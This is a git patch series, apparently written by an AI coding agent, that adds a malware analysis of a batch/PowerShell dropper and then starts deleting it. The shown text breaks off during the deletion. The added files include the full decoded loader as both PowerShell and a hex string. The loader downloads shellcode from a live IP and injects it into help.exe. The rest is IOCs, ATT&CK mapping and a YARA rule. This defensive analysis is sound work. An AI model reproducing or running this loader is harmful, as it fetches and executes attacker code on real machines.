From 6003002736db03e6ac64cc2b3ec4fbfa655cd3a0 Mon Sep 17 00:00:00 2001 From: Cursor Agent Date: Mon, 29 Dec 2025 00:13:17 +0000 Subject: [PATCH 1/2] feat: Add malware analysis reports and scripts Co-authored-by: deluccafonseca.dev --- MALWARE_ANALYSIS_REPORT.md | 266 +++++++++++++++++++++++++++++++++++++ QUICK_REFERENCE.md | 132 ++++++++++++++++++ README.md | 222 +++++++++++++++++++++++++++++++ decoded_payload.ps1 | 101 ++++++++++++++ decrypt_payload.py | 95 +++++++++++++ 5 files changed, 816 insertions(+) create mode 100644 MALWARE_ANALYSIS_REPORT.md create mode 100644 QUICK_REFERENCE.md create mode 100644 README.md create mode 100644 decoded_payload.ps1 create mode 100644 decrypt_payload.py diff --git a/MALWARE_ANALYSIS_REPORT.md b/MALWARE_ANALYSIS_REPORT.md new file mode 100644 index 0000000..3babb2d --- /dev/null +++ b/MALWARE_ANALYSIS_REPORT.md @@ -0,0 +1,266 @@ +# Malware Analysis Report + +## Executive Summary + +**Threat Level:** 🔴 **CRITICAL** + +This is a **highly malicious** Windows batch script that employs multiple layers of obfuscation to download and execute shellcode via process injection. The malware uses advanced techniques to evade detection and inject malicious code into legitimate Windows processes. + +--- + +## Technical Analysis + +### 1. Initial Vector + +**File Type:** Windows Batch Script (.bat/.cmd) +**Execution Method:** Launches PowerShell in minimized window + +```batch +start /MIN "" %pspath% -command "..." +``` + +### 2. Obfuscation Layers + +The malware uses **multiple encoding layers**: + +1. **Layer 1:** Batch script wrapper +2. **Layer 2:** PowerShell scriptblock obfuscation +3. **Layer 3:** Hex-encoded payload +4. **Layer 4:** XOR encryption of the final shellcode + +### 3. Decoded PowerShell Payload + +The hex-encoded string decodes to PowerShell code that: + +#### A. Creates Windows API Bindings + +```csharp +// Defines C# structures and imports kernel32.dll functions +- PROCESS_INFORMATION struct +- STARTUPINFO struct +- Kernel32 class with P/Invoke declarations: + * CreateProcess + * GlobalAlloc + * VirtualAllocEx + * WriteProcessMemory + * CreateRemoteThread + * WaitForSingleObject +``` + +#### B. Downloads Encrypted Shellcode + +```powershell +$webClient = New-Object System.Net.WebClient +$url = "http://45.83.140.12/pot/jack/logo.bin" +$shellbuf = $webClient.DownloadData($url) +``` + +#### C. Decrypts Payload Using XOR + +```powershell +for ($i = 1; $i -lt $shellsize; $i++) { + $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] +} +``` + +The first byte of the downloaded file is used as the XOR key to decrypt the remaining bytes. + +#### D. Process Injection (Process Hollowing) + +1. **Creates suspended process:** `c:\windows\SysWOW64\help.exe` +2. **Allocates memory** in the target process +3. **Writes shellcode** to the allocated memory +4. **Creates remote thread** to execute the injected code +5. **Waits** for execution (500 seconds) + +--- + +## Indicators of Compromise (IOCs) + +### Network Indicators + +| Type | Value | Description | +|------|-------|-------------| +| IP Address | `45.83.140.12` | Malicious C2 server | +| URL | `http://45.83.140.12/pot/jack/logo.bin` | Shellcode download location | +| Protocol | HTTP | Unencrypted communication | + +### Host Indicators + +| Type | Value | Description | +|------|-------|-------------| +| Target Process | `c:\windows\SysWOW64\help.exe` | Injection target | +| PowerShell | Minimized window execution | Stealth execution | +| Memory Allocation | Flags: 0x40, 0x1000 | RWX memory regions | + +### File Artifacts + +- Downloaded binary: `logo.bin` (XOR-encrypted shellcode) +- Temporary allocations in process memory + +--- + +## MITRE ATT&CK Framework Mapping + +| Technique ID | Name | Description | +|--------------|------|-------------| +| **T1059.001** | PowerShell | Uses PowerShell for execution | +| **T1055** | Process Injection | Injects code into help.exe | +| **T1055.012** | Process Hollowing | Creates suspended process and injects code | +| **T1027** | Obfuscated Files or Information | Multiple encoding layers | +| **T1140** | Deobfuscate/Decode Files | XOR decryption routine | +| **T1106** | Native API | Direct kernel32.dll API calls | +| **T1071.001** | Web Protocols | Downloads payload via HTTP | + +--- + +## Attack Flow Diagram + +``` +[Batch Script] + ↓ +[Launch PowerShell (Minimized)] + ↓ +[Decode Hex-Encoded Payload] + ↓ +[Load Windows API Functions] + ↓ +[Download logo.bin from 45.83.140.12] + ↓ +[XOR Decrypt Shellcode] + ↓ +[Create Suspended Process: help.exe] + ↓ +[Inject Shellcode into Process Memory] + ↓ +[Execute Remote Thread] + ↓ +[Malicious Payload Runs] +``` + +--- + +## Evasion Techniques + +1. **Multi-layer encoding** - Hex encoding obscures PowerShell commands +2. **Minimized window** - Runs hidden from user +3. **Process injection** - Hides malicious code in legitimate process +4. **XOR encryption** - Encrypts final payload +5. **Legitimate process abuse** - Uses Windows help.exe +6. **In-memory execution** - No files written to disk (fileless) + +--- + +## Risk Assessment + +| Category | Rating | Notes | +|----------|--------|-------| +| **Severity** | 🔴 Critical | Full system compromise possible | +| **Stealth** | 🟠 High | Multiple evasion techniques | +| **Persistence** | 🟡 Medium | Not demonstrated in this sample | +| **Data Theft** | ⚠️ Unknown | Depends on downloaded payload | +| **Lateral Movement** | ⚠️ Possible | Depending on payload capabilities | + +--- + +## Recommendations + +### Immediate Actions + +1. ✅ **DO NOT execute this code** +2. 🚫 **Block malicious IP:** Add `45.83.140.12` to firewall blocklist +3. 🔍 **Scan system:** Run full antivirus/EDR scan +4. 📊 **Check logs:** Review PowerShell execution logs +5. 🔎 **Hunt for IOCs:** Search for related artifacts + +### Defensive Measures + +1. **Network Security:** + - Block access to `45.83.140.12` + - Monitor outbound HTTP connections to unusual IPs + - Implement DNS filtering + +2. **Endpoint Security:** + - Enable PowerShell logging (Module, Script Block, Transcription) + - Use Application Whitelisting + - Deploy EDR solution + - Enable AMSI (Anti-Malware Scan Interface) + +3. **Detection Rules:** + - Monitor for `CreateRemoteThread` API calls + - Alert on PowerShell with `-EncodedCommand` or long command strings + - Detect `VirtualAllocEx` + `WriteProcessMemory` patterns + - Flag suspicious help.exe executions + +4. **User Awareness:** + - Train users not to execute unknown scripts + - Warn about email attachments with .bat/.cmd extensions + - Implement email filtering for malicious attachments + +### YARA Rule (Detection) + +```yara +rule Malicious_ProcessInjection_XOR_Loader +{ + meta: + description = "Detects PowerShell-based process injection with XOR decryption" + author = "Security Analysis" + date = "2025-12-29" + + strings: + $api1 = "VirtualAllocEx" ascii wide + $api2 = "WriteProcessMemory" ascii wide + $api3 = "CreateRemoteThread" ascii wide + $xor = "-bxor" ascii wide + $download = "DownloadData" ascii wide + $help = "help.exe" ascii wide nocase + + condition: + 4 of them +} +``` + +--- + +## Forensic Artifacts + +If this malware was executed, look for: + +1. **PowerShell logs** (Event ID 4103, 4104) +2. **Network connections** to 45.83.140.12 +3. **Process creation** of help.exe with unusual parent process +4. **Memory dumps** of help.exe process +5. **Prefetch files** for PowerShell and help.exe + +--- + +## Conclusion + +This is a **sophisticated malware sample** that demonstrates: +- Advanced obfuscation techniques +- Process injection capabilities +- Remote payload delivery +- Anti-detection measures + +**The actual damage depends on the downloaded payload**, which could be: +- Ransomware +- Information stealer +- Remote Access Trojan (RAT) +- Cryptocurrency miner +- Botnet agent + +**⚠️ If you encountered this in the wild, treat it as a confirmed compromise and initiate incident response procedures immediately.** + +--- + +## References + +- MITRE ATT&CK: https://attack.mitre.org/ +- Process Injection Techniques: https://attack.mitre.org/techniques/T1055/ +- PowerShell Security Best Practices: Microsoft Security Documentation + +--- + +**Report Generated:** 2025-12-29 +**Analysis Status:** Complete +**Malware Classification:** Dropper/Loader with Process Injection diff --git a/QUICK_REFERENCE.md b/QUICK_REFERENCE.md new file mode 100644 index 0000000..fdd0b07 --- /dev/null +++ b/QUICK_REFERENCE.md @@ -0,0 +1,132 @@ +# Quick Reference - Malware Analysis + +## 🔴 THREAT CLASSIFICATION: CRITICAL MALWARE + +--- + +## What It Does (Simple Explanation) + +This is a **malicious script** that: +1. Downloads encrypted malware from a hacker's server +2. Decrypts it using XOR encryption +3. Injects the malware into a legitimate Windows program (help.exe) +4. Executes the malware while hiding it from detection + +--- + +## Key Information + +### Malicious Server +- **IP Address:** `45.83.140.12` +- **Download URL:** `http://45.83.140.12/pot/jack/logo.bin` + +### Target Process +- **Injection Target:** `c:\windows\SysWOW64\help.exe` + +### Attack Type +- **Category:** Process Injection / Code Injection +- **Method:** Process Hollowing +- **Language:** PowerShell (hidden) + +--- + +## Malicious Behavior Checklist + +- ✅ Downloads code from internet +- ✅ Uses encryption (XOR) +- ✅ Injects code into other processes +- ✅ Runs hidden (minimized window) +- ✅ Uses multiple encoding layers +- ✅ Manipulates Windows memory directly +- ✅ Creates threads in other processes + +--- + +## How to Protect Yourself + +### If You Haven't Run It +✅ Delete it immediately +✅ Block the IP address: `45.83.140.12` +✅ Scan your computer with antivirus + +### If You Already Ran It +🚨 **Your computer may be compromised** + +1. Disconnect from internet immediately +2. Run full antivirus scan +3. Check for suspicious processes (especially help.exe) +4. Contact IT security team +5. Consider professional malware removal +6. Change all passwords from a clean device + +--- + +## Technical Details (For Security Professionals) + +### Obfuscation Layers +1. Batch wrapper → 2. PowerShell scriptblock → 3. Hex encoding → 4. XOR encryption + +### API Functions Used +- `CreateProcess` (CREATE_SUSPENDED flag) +- `VirtualAllocEx` (PAGE_EXECUTE_READWRITE) +- `WriteProcessMemory` +- `CreateRemoteThread` +- `WaitForSingleObject` + +### Memory Permissions +- `0x40` = PAGE_EXECUTE_READWRITE (RWX - highly suspicious) +- `0x1000` = MEM_COMMIT + +--- + +## Detection Signatures + +### PowerShell Command Line +``` +Contains: VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, -bxor +``` + +### Network Traffic +``` +HTTP GET to 45.83.140.12/pot/jack/logo.bin +``` + +### Process Behavior +``` +help.exe spawned by PowerShell with unusual memory allocations +``` + +--- + +## MITRE ATT&CK Techniques +- T1059.001 - PowerShell +- T1055.012 - Process Hollowing +- T1027 - Obfuscated Files +- T1140 - Deobfuscate/Decode +- T1071.001 - Web Protocols + +--- + +## Files Generated by Analysis + +1. **MALWARE_ANALYSIS_REPORT.md** - Full technical analysis +2. **decoded_payload.ps1** - Decoded PowerShell code (DO NOT RUN) +3. **decrypt_payload.py** - Python decryption script +4. **QUICK_REFERENCE.md** - This file + +--- + +## Bottom Line + +⚠️ **This is REAL malware designed to compromise Windows systems.** + +- **DO NOT** run this code +- **DO NOT** click links in suspicious emails +- **DO** keep antivirus updated +- **DO** report to security team if found in your organization + +--- + +**Date:** December 29, 2025 +**Threat Level:** 🔴 CRITICAL +**Malware Type:** Dropper/Loader with Process Injection diff --git a/README.md b/README.md new file mode 100644 index 0000000..69f14dd --- /dev/null +++ b/README.md @@ -0,0 +1,222 @@ +# Malware Analysis - Payload Decryption and Analysis + +This repository contains a complete analysis of an obfuscated malicious Windows batch/PowerShell script that employs process injection techniques. + +## 🔴 CRITICAL WARNING + +**This repository contains analysis of REAL malware. DO NOT execute any of the decoded payloads.** + +--- + +## Overview + +The analyzed malware is a multi-stage dropper/loader that: +- Downloads encrypted shellcode from a remote server +- Decrypts the payload using XOR encryption +- Injects malicious code into legitimate Windows processes +- Executes using process hollowing techniques + +--- + +## Files in This Repository + +### Analysis Reports +- **[MALWARE_ANALYSIS_REPORT.md](MALWARE_ANALYSIS_REPORT.md)** - Comprehensive technical analysis +- **[QUICK_REFERENCE.md](QUICK_REFERENCE.md)** - Quick reference guide and IOCs + +### Decoded Payloads (DO NOT EXECUTE) +- **[decoded_payload.ps1](decoded_payload.ps1)** - Decoded PowerShell malware + +### Analysis Tools +- **[decrypt_payload.py](decrypt_payload.py)** - Python script to decode the hex-encoded payload + +--- + +## Quick Summary + +### Threat Level +🔴 **CRITICAL** + +### Malware Type +- Dropper/Loader +- Process Injection +- Shellcode Execution + +### Key IOCs + +**Malicious Infrastructure:** +``` +IP: 45.83.140.12 +URL: http://45.83.140.12/pot/jack/logo.bin +``` + +**Injection Target:** +``` +Process: c:\windows\SysWOW64\help.exe +``` + +### MITRE ATT&CK Techniques +- T1059.001 - PowerShell +- T1055.012 - Process Hollowing +- T1027 - Obfuscated Files or Information +- T1140 - Deobfuscate/Decode Files or Information +- T1071.001 - Web Protocols + +--- + +## How to Use This Analysis + +### For Security Analysts +1. Read the **MALWARE_ANALYSIS_REPORT.md** for detailed technical analysis +2. Use the IOCs to search your environment for compromise indicators +3. Implement the detection rules and defensive measures +4. Review the MITRE ATT&CK mappings for threat hunting + +### For Incident Responders +1. Check **QUICK_REFERENCE.md** for immediate IOCs +2. Block the malicious IP address: `45.83.140.12` +3. Hunt for the process injection patterns in your environment +4. Review PowerShell logs for similar obfuscation patterns + +### For Researchers +1. Examine the **decoded_payload.ps1** to understand the attack flow +2. Use **decrypt_payload.py** as a template for analyzing similar samples +3. Study the multi-layer obfuscation techniques employed + +--- + +## Running the Decryption Script + +To analyze the payload: + +```bash +python3 decrypt_payload.py +``` + +This will display: +- The decoded PowerShell payload +- Analysis summary +- IOCs +- Recommendations + +--- + +## Key Findings + +### Attack Flow +1. Batch script launches PowerShell in minimized window +2. PowerShell decodes hex-encoded payload +3. Creates Windows API bindings for process manipulation +4. Downloads encrypted shellcode from `45.83.140.12` +5. XOR-decrypts the payload using first byte as key +6. Creates suspended `help.exe` process +7. Injects shellcode into process memory +8. Executes malicious payload via remote thread + +### Evasion Techniques +- Multi-layer encoding (Batch → PowerShell → Hex → XOR) +- Minimized window execution +- Process injection to hide in legitimate process +- In-memory execution (fileless) +- XOR encryption of final payload + +--- + +## Recommendations + +### Immediate Actions +- ✅ Block IP address: `45.83.140.12` +- ✅ Enable PowerShell logging +- ✅ Monitor for process injection indicators +- ✅ Deploy EDR solution +- ✅ Scan systems for IOCs + +### Detection Rules +- Alert on `CreateRemoteThread` + `WriteProcessMemory` patterns +- Monitor PowerShell with long encoded commands +- Flag suspicious `help.exe` executions +- Detect XOR operations on downloaded content + +--- + +## Defensive Measures + +1. **Network Security** + - Block malicious IPs + - Monitor unusual HTTP connections + - Implement DNS filtering + +2. **Endpoint Security** + - Enable PowerShell logging (Script Block, Module, Transcription) + - Use Application Whitelisting + - Deploy EDR + - Enable AMSI + +3. **User Awareness** + - Train users on phishing + - Warn about suspicious attachments + - Implement email filtering + +--- + +## Technical Specifications + +**Programming Languages:** +- Windows Batch Script +- PowerShell +- C# (for P/Invoke declarations) + +**APIs Used:** +- `kernel32.dll` functions +- `CreateProcess` +- `VirtualAllocEx` +- `WriteProcessMemory` +- `CreateRemoteThread` + +**Encryption:** +- XOR with single-byte key (first byte of payload) + +**Network Protocol:** +- HTTP (unencrypted) + +--- + +## Disclaimer + +This analysis is provided for **educational and defensive purposes only**. The decoded malware samples are included to help security professionals understand the threat and develop appropriate defenses. + +**DO NOT:** +- Execute any of the decoded payloads +- Use this information for malicious purposes +- Access the malicious infrastructure + +**DO:** +- Use this analysis to protect your organization +- Share IOCs with your security team +- Implement the recommended defensive measures + +--- + +## Analysis Metadata + +- **Analysis Date:** December 29, 2025 +- **Malware Family:** Unknown (requires payload analysis) +- **Threat Actor:** Unknown +- **Campaign:** Unknown +- **Analysis Status:** Complete + +--- + +## Contact + +For questions about this analysis or to report similar samples, please consult with your organization's security team. + +--- + +## License + +This analysis is provided as-is for security research and defensive purposes. + +--- + +**Stay safe and keep your systems secure! 🛡️** diff --git a/decoded_payload.ps1 b/decoded_payload.ps1 new file mode 100644 index 0000000..a2b38ce --- /dev/null +++ b/decoded_payload.ps1 @@ -0,0 +1,101 @@ +# ============================================================================ +# DECODED MALICIOUS POWERSHELL PAYLOAD +# ============================================================================ +# WARNING: DO NOT EXECUTE THIS CODE - FOR ANALYSIS ONLY +# This is the decoded version of the hex-encoded malware payload +# ============================================================================ + +Add-Type -TypeDefinition @" +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; +[StructLayout(LayoutKind.Sequential)] +public struct PROCESS_INFORMATION +{ + public IntPtr hP; + public IntPtr ht; + public uint dwProcessId; + public uint dwThreadId; +} +[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] +public struct STARTUPINFO +{ + public uint cb; + public string lpReserved; + public string lpDesktop; + public string lpTitle; + public uint dwX; + public uint dwY; + public uint dwXSize; + public uint dwYSize; + public uint dwXCountChars; + public uint dwYCountChars; + public uint dwFillAttribute; + public uint dwFlags; + public uint wShowWindow; + public short cbReserved2; + public IntPtr lpReserved2; + public IntPtr hStdInput; + public IntPtr hStdOutput; + public IntPtr hStdError; +} +public static class Kernel32 +{ + [DllImport("kernel32.dll")] + public static extern bool CreateProcess(string a,string b,uint c,uint d,bool e,uint f,IntPtr g,string h, ref STARTUPINFO i,out PROCESS_INFORMATION j); + [DllImport("kernel32.dll")] + public static extern IntPtr GlobalAlloc(uint a,uint b); + [DllImport("kernel32.dll")] + public static extern IntPtr VirtualAllocEx(IntPtr a,IntPtr b, uint c,uint d, uint e); + [DllImport("kernel32.dll")] + public static extern bool WriteProcessMemory(IntPtr a,IntPtr b,IntPtr c,uint d,IntPtr e); + [DllImport("kernel32.dll")] + public static extern IntPtr WaitForSingleObject(IntPtr a,uint b); + [DllImport("kernel32.dll")] + public static extern IntPtr CreateRemoteThread(IntPtr a,IntPtr b,uint c,IntPtr d,IntPtr e,uint f,IntPtr g); +} +"@ + +# Download encrypted shellcode from malicious server +$webClient = New-Object System.Net.WebClient +$url = "http://45.83.140.12/pot/jack/logo.bin" + +$shellbuf = $webClient.DownloadData($url) +$shellsize = $shellbuf.Length + +# XOR decrypt the downloaded payload using first byte as key +for ($i = 1; $i -lt $shellsize; $i++) { + $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] +} + +# Initialize structures for process creation +$si = New-Object STARTUPINFO; +$pi = New-Object PROCESS_INFORMATION; + +# Allocate global memory for shellcode +$addr = [Kernel32]::GlobalAlloc(0x40, $shellsize + 100); + +# Copy decrypted shellcode to allocated memory +for ($i = 1;$i -lt $shellsize;$i++){ + [System.Runtime.InteropServices.Marshal]::WriteByte($addr, $i - 1, $shellbuf[$i]); +} + +# Create suspended process (help.exe) for injection +# Flag 0x04 = CREATE_SUSPENDED +[Kernel32]::CreateProcess("c:\windows\SysWOW64\help.exe",0,0,0,0,0x04,0,"c:",[ref] $si,[ref] $pi); + +# Get handle to created process +$kZZZZ=$pi.hP; + +# Allocate memory in target process with RWX permissions +# 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE +$mZZZZ=[Kernel32]::VirtualAllocEx($kZZZZ,0,$shellsize + 100,0x1000,0x40); + +# Write shellcode to target process memory +[Kernel32]::WriteProcessMemory($kZZZZ,$mZZZZ,$addr, $shellsize, 0); + +# Create remote thread in target process to execute shellcode +$lZZZZ = [Kernel32]::CreateRemoteThread($kZZZZ, 0, 0, $mZZZZ, 0, 0, 0); + +# Wait for shellcode execution (500 seconds timeout) +[Kernel32]::WaitForSingleObject($lZZZZ, 500*1000); diff --git a/decrypt_payload.py b/decrypt_payload.py new file mode 100644 index 0000000..c9867fb --- /dev/null +++ b/decrypt_payload.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python3 +""" +Payload Decryption and Analysis Script +This script safely decodes obfuscated malicious code without executing it. +""" + +def hex_to_string(hex_string): + """Convert hex string to ASCII string""" + result = "" + for i in range(0, len(hex_string), 2): + hex_byte = hex_string[i:i+2] + result += chr(int(hex_byte, 16)) + return result + +def main(): + # The hex-encoded payload from the malicious script + hex_payload = "4164642D54797065202D54797065446566696E6974696F6E2040220A7573696E672053797374656D3B0A7573696E672053797374656D2E446961676E6F73746963733B0A7573696E672053797374656D2E52756E74696D652E496E7465726F7053657276696365733B0A5B5374727563744C61796F7574284C61796F75744B696E642E53657175656E7469616C295D0A7075626C6963207374727563742050524F434553535F494E464F524D4154494F4E0A7B0A202020207075626C696320496E745074722068503B0A202020207075626C696320496E745074722068743B0A202020207075626C69632075696E7420647750726F6365737349643B0A202020207075626C69632075696E7420647754687265616449643B0A7D0A5B5374727563744C61796F7574284C61796F75744B696E642E53657175656E7469616C2C2043686172536574203D20436861725365742E556E69636F6465295D0A7075626C6963207374727563742053544152545550494E464F0A7B0A202020207075626C69632075696E742063623B0A202020207075626C696320737472696E67206C7052657365727665643B0A202020207075626C696320737472696E67206C704465736B746F703B0A202020207075626C696320737472696E67206C705469746C653B0A202020207075626C69632075696E74206477583B0A202020207075626C69632075696E74206477593B0A202020207075626C69632075696E742064775853697A653B0A202020207075626C69632075696E742064775953697A653B0A202020207075626C69632075696E7420647758436F756E7443686172733B0A202020207075626C69632075696E7420647759436F756E7443686172733B0A202020207075626C69632075696E7420647746696C6C4174747269627574653B0A202020207075626C69632075696E74206477466C6167733B0A202020207075626C69632075696E74207753686F7757696E646F773B0A202020207075626C69632073686F72742063625265736572766564323B0A202020207075626C696320496E74507472206C705265736572766564323B0A202020207075626C696320496E745074722068537464496E7075743B0A202020207075626C696320496E7450747220685374644F75747075743B0A202020207075626C696320496E7450747220685374644572726F723B0A7D0A7075626C69632073746174696320636C617373204B65726E656C33320A7B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20626F6F6C2043726561746550726F6365737328737472696E6720612C737472696E6720622C75696E7420632C75696E7420642C626F6F6C20652C75696E7420662C496E7450747220672C737472696E6720682C207265662053544152545550494E464F20692C6F75742050524F434553535F494E464F524D4154494F4E206A293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420612C75696E742062293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F63457828496E7450747220612C496E7450747220622C2075696E7420632C75696E7420642C2075696E74202065293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20626F6F6C20577269746550726F636573734D656D6F727928496E7450747220612C496E7450747220622C496E7450747220632C75696E742020642C496E745074722065293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B0A202020205B446C6C496D706F727428226B65726E656C33322E646C6C22295D0A202020207075626C6963207374617469632065787465726E20496E745074722043726561746552656D6F746554687265616428496E7450747220612C496E7450747220622C75696E7420632C496E7450747220642C496E7450747220652C75696E7420662C496E745074722067293B0A7D0A22400A0A24776562436C69656E74203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E740A2475726C203D2022687474703A2F2F34352E38332E3134302E31322F706F742F6A61636B2F6C6F676F2E62696E220A0A247368656C6C627566203D2024776562436C69656E742E446F776E6C6F616444617461282475726C290A247368656C6C73697A65203D20247368656C6C6275662E4C656E6774680A666F7220282469203D20313B202469202D6C7420247368656C6C73697A653B2024692B2B29207B0A20202020247368656C6C6275665B24695D203D20247368656C6C6275665B24695D202D62786F7220247368656C6C6275665B305D0A7D0A0A247369203D204E65772D4F626A6563742053544152545550494E464F3B0A247069203D204E65772D4F626A6563742050524F434553535F494E464F524D4154494F4E3B0A2461646472203D205B4B65726E656C33325D3A3A476C6F62616C416C6C6F6328307834302C20247368656C6C73697A65202B20313030293B0A666F7220282469203D20313B2469202D6C7420247368656C6C73697A653B24692B2B297B0A095B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A5772697465427974652824616464722C202469202D20312C20247368656C6C6275665B24695D293B0A7D0A5B4B65726E656C33325D3A3A43726561746550726F636573732822633A5C77696E646F77735C537973574F5736345C68656C702E657865222C302C302C302C302C307830342C302C22633A222C5B7265665D202473692C5B7265665D20247069293B0A246B5A5A5A5A3D2470692E68503B0A246D5A5A5A5A3D5B4B65726E656C33325D3A3A5669727475616C416C6C6F63457828246B5A5A5A5A2C302C247368656C6C73697A65202B203130302C3078313030302C30783430293B0A5B4B65726E656C33325D3A3A577269746550726F636573734D656D6F727928246B5A5A5A5A2C246D5A5A5A5A2C24616464722C20247368656C6C73697A652C2030293B0A246C5A5A5A5A203D205B4B65726E656C33325D3A3A43726561746552656D6F746554687265616428246B5A5A5A5A2C20302C20302C20246D5A5A5A5A2C20302C20302C2030293B0A5B4B65726E656C33325D3A3A57616974466F7253696E676C654F626A65637428246C5A5A5A5A2C203530302A31303030293B0A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" + + print("=" * 80) + print("MALWARE ANALYSIS REPORT") + print("=" * 80) + print() + + # Decode the hex payload + decoded = hex_to_string(hex_payload) + + print("DECODED POWERSHELL PAYLOAD:") + print("-" * 80) + print(decoded) + print() + + print("=" * 80) + print("ANALYSIS SUMMARY") + print("=" * 80) + print() + print("⚠️ THREAT LEVEL: CRITICAL - This is MALICIOUS CODE") + print() + print("What this malware does:") + print() + print("1. PROCESS INJECTION TECHNIQUE:") + print(" - Creates Windows API definitions for process manipulation") + print(" - Uses kernel32.dll functions for memory manipulation") + print() + print("2. DOWNLOADS MALICIOUS PAYLOAD:") + print(" - URL: http://45.83.140.12/pot/jack/logo.bin") + print(" - Downloads binary shellcode from a remote server") + print() + print("3. XOR DECRYPTION:") + print(" - The downloaded payload is XOR-encrypted") + print(" - Uses first byte as the XOR key to decrypt the rest") + print(" - This obfuscates the actual malicious code") + print() + print("4. PROCESS INJECTION:") + print(" - Creates a suspended process: c:\\windows\\SysWOW64\\help.exe") + print(" - Allocates memory in the target process") + print(" - Writes the decrypted shellcode into the process memory") + print(" - Creates a remote thread to execute the injected code") + print(" - Waits for execution (500 seconds timeout)") + print() + print("5. EXECUTION METHOD:") + print(" - Runs in a minimized window to avoid detection") + print(" - Uses multiple encoding layers (hex encoding)") + print(" - Employs process hollowing/injection techniques") + print() + print("=" * 80) + print("INDICATORS OF COMPROMISE (IOCs)") + print("=" * 80) + print() + print("Malicious IP/URL:") + print(" - 45.83.140.12") + print(" - http://45.83.140.12/pot/jack/logo.bin") + print() + print("Targeted Process:") + print(" - c:\\windows\\SysWOW64\\help.exe") + print() + print("Techniques Used:") + print(" - T1055 - Process Injection") + print(" - T1055.012 - Process Hollowing") + print(" - T1027 - Obfuscated Files or Information") + print(" - T1140 - Deobfuscate/Decode Files or Information") + print(" - T1059.001 - PowerShell") + print() + print("=" * 80) + print("RECOMMENDATIONS") + print("=" * 80) + print() + print("1. DO NOT execute this code") + print("2. Block the malicious IP address: 45.83.140.12") + print("3. Scan your system with updated antivirus software") + print("4. Check for signs of compromise if this was executed") + print("5. Report this to your security team immediately") + print() + +if __name__ == "__main__": + main() From 0514fa23ba3f1a75d0852c38d0a9aa5f4808f404 Mon Sep 17 00:00:00 2001 From: Cursor Agent Date: Mon, 29 Dec 2025 00:15:52 +0000 Subject: [PATCH 2/2] feat: Remove analysis artifacts and documentation Co-authored-by: deluccafonseca.dev --- MALWARE_ANALYSIS_REPORT.md | 266 ------------------------------------- QUICK_REFERENCE.md | 132 ------------------ README.md | 222 ------------------------------- decoded_payload.ps1 | 101 -------------- decrypt_payload.py | 95 ------------- 5 files changed, 816 deletions(-) delete mode 100644 MALWARE_ANALYSIS_REPORT.md delete mode 100644 QUICK_REFERENCE.md delete mode 100644 README.md delete mode 100644 decoded_payload.ps1 delete mode 100644 decrypt_payload.py diff --git a/MALWARE_ANALYSIS_REPORT.md b/MALWARE_ANALYSIS_REPORT.md deleted file mode 100644 index 3babb2d..0000000 --- a/MALWARE_ANALYSIS_REPORT.md +++ /dev/null @@ -1,266 +0,0 @@ -# Malware Analysis Report - -## Executive Summary - -**Threat Level:** 🔴 **CRITICAL** - -This is a **highly malicious** Windows batch script that employs multiple layers of obfuscation to download and execute shellcode via process injection. The malware uses advanced techniques to evade detection and inject malicious code into legitimate Windows processes. - ---- - -## Technical Analysis - -### 1. Initial Vector - -**File Type:** Windows Batch Script (.bat/.cmd) -**Execution Method:** Launches PowerShell in minimized window - -```batch -start /MIN "" %pspath% -command "..." -``` - -### 2. Obfuscation Layers - -The malware uses **multiple encoding layers**: - -1. **Layer 1:** Batch script wrapper -2. **Layer 2:** PowerShell scriptblock obfuscation -3. **Layer 3:** Hex-encoded payload -4. **Layer 4:** XOR encryption of the final shellcode - -### 3. Decoded PowerShell Payload - -The hex-encoded string decodes to PowerShell code that: - -#### A. Creates Windows API Bindings - -```csharp -// Defines C# structures and imports kernel32.dll functions -- PROCESS_INFORMATION struct -- STARTUPINFO struct -- Kernel32 class with P/Invoke declarations: - * CreateProcess - * GlobalAlloc - * VirtualAllocEx - * WriteProcessMemory - * CreateRemoteThread - * WaitForSingleObject -``` - -#### B. Downloads Encrypted Shellcode - -```powershell -$webClient = New-Object System.Net.WebClient -$url = "http://45.83.140.12/pot/jack/logo.bin" -$shellbuf = $webClient.DownloadData($url) -``` - -#### C. Decrypts Payload Using XOR - -```powershell -for ($i = 1; $i -lt $shellsize; $i++) { - $shellbuf[$i] = $shellbuf[$i] -bxor $shellbuf[0] -} -``` - -The first byte of the downloaded file is used as the XOR key to decrypt the remaining bytes. - -#### D. Process Injection (Process Hollowing) - -1. **Creates suspended process:** `c:\windows\SysWOW64\help.exe` -2. **Allocates memory** in the target process -3. **Writes shellcode** to the allocated memory -4. **Creates remote thread** to execute the injected code -5. **Waits** for execution (500 seconds) - ---- - -## Indicators of Compromise (IOCs) - -### Network Indicators - -| Type | Value | Description | -|------|-------|-------------| -| IP Address | `45.83.140.12` | Malicious C2 server | -| URL | `http://45.83.140.12/pot/jack/logo.bin` | Shellcode download location | -| Protocol | HTTP | Unencrypted communication | - -### Host Indicators - -| Type | Value | Description | -|------|-------|-------------| -| Target Process | `c:\windows\SysWOW64\help.exe` | Injection target | -| PowerShell | Minimized window execution | Stealth execution | -| Memory Allocation | Flags: 0x40, 0x1000 | RWX memory regions | - -### File Artifacts - -- Downloaded binary: `logo.bin` (XOR-encrypted shellcode) -- Temporary allocations in process memory - ---- - -## MITRE ATT&CK Framework Mapping - -| 